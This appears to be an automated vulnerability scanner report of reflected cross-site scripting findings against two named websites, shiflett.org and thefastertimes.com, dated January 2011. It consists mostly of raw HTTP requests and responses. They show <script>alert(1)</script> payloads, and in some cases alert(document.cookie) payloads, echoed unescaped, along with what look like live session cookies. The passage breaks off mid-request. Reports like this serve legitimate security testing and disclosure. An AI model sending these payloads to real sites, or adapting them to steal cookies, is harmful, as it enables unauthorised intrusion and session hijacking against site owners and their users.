GET /images44b7b<script>alert(1)</script>9955f5d98cd/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: shiflett.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e40d<script>alert(1)</script>cfd456afc3e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/foiling_cross_site_attacks_2.png3e40d<script>alert(1)</script>cfd456afc3e/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: shiflett.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e77d2<script>alert(1)</script>ed10b7483a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imagese77d2<script>alert(1)</script>ed10b7483a3/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: shiflett.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3fc2c<script>alert(1)</script>ca3d970e655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/foiling_cross_site_attacks_2.png3fc2c<script>alert(1)</script>ca3d970e655/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1 Host: shiflett.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.82. http://thefastertimes.com/about/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://thefastertimes.com
Path:
/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8001"><script>alert(1)</script>a1b8a31b6e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8001\"><script>alert(1)</script>a1b8a31b6e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /about/?f8001"><script>alert(1)</script>a1b8a31b6e6=1 HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;
Response
HTTP/1.0 200 OK Date: Mon, 31 Jan 2011 20:52:00 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Vary: Cookie X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/about/?f8001\"><script>alert(1)</script>a1b8a31b6e6=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30f95"><script>alert(1)</script>ba9b92ed14b was submitted in the REST URL parameter 1. This input was echoed as 30f95\"><script>alert(1)</script>ba9b92ed14b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95"><script>alert(1)</script>ba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:01:37 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:01:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia30f95\"><script>alert(1)</script>ba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1307"><script>alert(1)</script>97e10d51e52 was submitted in the REST URL parameter 2. This input was echoed as f1307\"><script>alert(1)</script>97e10d51e52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011f1307"><script>alert(1)</script>97e10d51e52/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:02:22 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=21377961c5fe6ca527ac4b7a3f5c7ae3; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:02:21 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia/2011f1307\"><script>alert(1)</script>97e10d51e52/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cdd"><script>alert(1)</script>cc94d955a23 was submitted in the REST URL parameter 3. This input was echoed as 89cdd\"><script>alert(1)</script>cc94d955a23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011/0189cdd"><script>alert(1)</script>cc94d955a23/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:04:33 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=990e20ffb5e6047b90ac8ea04654f25a; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:04:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia/2011/0189cdd\"><script>alert(1)</script>cc94d955a23/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73ff"><script>alert(1)</script>8db99260b37 was submitted in the REST URL parameter 4. This input was echoed as f73ff\"><script>alert(1)</script>8db99260b37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011/01/25f73ff"><script>alert(1)</script>8db99260b37/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:04:39 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=94e3c93da979f5c6aaa6b1b37e48d845; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:04:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25f73ff\"><script>alert(1)</script>8db99260b37/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a32"><script>alert(1)</script>70e86cd3338 was submitted in the REST URL parameter 5. This input was echoed as 32a32\"><script>alert(1)</script>70e86cd3338 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman32a32"><script>alert(1)</script>70e86cd3338/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:04:45 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=3123b41cae1efa35d010678b001ca2fb; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:04:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman32a32\"><script>alert(1)</script>70e86cd3338/x26amp" /> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20215"><script>alert(1)</script>3f11104f034 was submitted in the REST URL parameter 6. This input was echoed as 20215\"><script>alert(1)</script>3f11104f034 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp20215"><script>alert(1)</script>3f11104f034;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:05:13 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=0ef8276f563ac145ff17e6a808d7e416; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:05:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp20215\"><script>alert(1)</script>3f11104f034;rct\\\\x3dj\\\\x26amp;sa\\\\x3dX\\\\x26amp;ei\\\\x3dteNGTZzQLsb_lged9pk8\\\\x26amp;ved\\\\x3d0CHQQpwIwCQ\\\\x26amp;q\\\\x3dcross+site+scripting\\\\x26amp;usg\\\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\ ...[SNIP]...
1.89. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a233"><script>alert(1)</script>c66f355344f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a233\"><script>alert(1)</script>c66f355344f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp?4a233"><script>alert(1)</script>c66f355344f=1 HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:00:56 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=2f30351892d2c2142b9d3a85c352577e; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:00:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp?4a233\"><script>alert(1)</script>c66f355344f=1" /> ...[SNIP]...
The value of the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f748"><script>alert(1)</script>6e9663119ac was submitted in the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter. This input was echoed as 9f748\"><script>alert(1)</script>6e9663119ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x229f748"><script>alert(1)</script>6e9663119ac HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 18:01:33 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Set-Cookie: PHPSESSID=59abd215b5d8ee4c4ab4ca9b598dc7b9; path=/ Vary: Cookie X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 18:01:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... \\\x3dj\\\\x26amp;sa\\\\x3dX\\\\x26amp;ei\\\\x3dteNGTZzQLsb_lged9pk8\\\\x26amp;ved\\\\x3d0CHQQpwIwCQ\\\\x26amp;q\\\\x3dcross+site+scripting\\\\x26amp;usg\\\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\\\x229f748\"><script>alert(1)</script>6e9663119ac" /> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8188"><script>alert(1)</script>e9ff90f9af1 was submitted in the REST URL parameter 10. This input was echoed as a8188\"><script>alert(1)</script>e9ff90f9af1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.coma8188"><script>alert(1)</script>e9ff90f9af1/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:09:11 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:09:11 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... script%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.coma8188\"><script>alert(1)</script>e9ff90f9af1/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20% ...[SNIP]...
The value of REST URL parameter 11 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d576"><script>alert(1)</script>803d0c7c394 was submitted in the REST URL parameter 11. This input was echoed as 2d576\"><script>alert(1)</script>803d0c7c394 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files2d576"><script>alert(1)</script>803d0c7c394/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 22:10:23 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 22:10:23 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... %3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files2d576\"><script>alert(1)</script>803d0c7c394/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E ...[SNIP]...
The value of REST URL parameter 12 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b157"><script>alert(1)</script>b60a879cda8 was submitted in the REST URL parameter 12. This input was echoed as 2b157\"><script>alert(1)</script>b60a879cda8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/20112b157"><script>alert(1)</script>b60a879cda8/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: 